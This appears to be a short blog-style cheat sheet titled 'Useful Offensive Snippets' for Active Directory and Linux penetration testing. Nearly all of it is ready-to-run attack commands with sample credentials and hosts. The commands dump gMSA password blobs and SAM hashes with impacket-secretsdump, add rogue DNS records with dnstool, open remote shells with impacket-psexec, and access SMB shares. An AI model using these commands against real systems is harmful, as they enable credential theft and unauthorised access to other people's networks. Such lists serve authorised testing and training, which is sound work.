Useful Offensive Snippets

Windows

SMB Connect

smbclient -U <USER> //<HOST>/<SHARE>
smbclient -U Diddy.Doodat //pwned.com/Backup

Add DNS record kerberos

python3 dnstool.py -u '<DOMAIN>\<USER>' -p <PASSWORD> -r pwned.hacker.com -a add -t A -d <DOMAIN IP> <DNS IP>
python3 dnstool.py -u 'hacked\diddy.doodat' -p OMGJonathanScott -r pwned.hacker.com -a add -t A -d 10.10.10.12 86.32.12.233

Dump gMSA password blobs

python3 gMSADumper.py -u '<USER>' -p '<PASSWORD>' -d <DOMAIN>
python3 gMSADumper.py -u 'diddy.doodat' -p 'OMGJonathanScott' -d pwned.hacker.com

Mount SMB share to Linux Host

mount -t cifs //<HOST>/<SHARE> /tmp/mnt
mount -t cifs //128.11.2.121/Pwned /tmp/mnt

Shell from Linux with Impacket (psexec)

impacket-psexec -k -no-pass <DOMAIN>/<USER>@<HOST>
impacket-psexec -k -no-pass hacked.com/Administrator@dc.hacked.com

Dump SAM hashes on Linux

impacket-secretsdump -sam SAM -system SYSTEM local

Linux

Fix Clock Skew Error

sudo ntpdate <NTP SERVER IP>
sudo ntpdate 10.11.1.211

Mount VHD

guestmount --add <IMAGE>.vhd --inspector --ro -v /tmp/vhd
guestmount — add leaked.vhd — inspector — ro -v /tmp/vhd

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store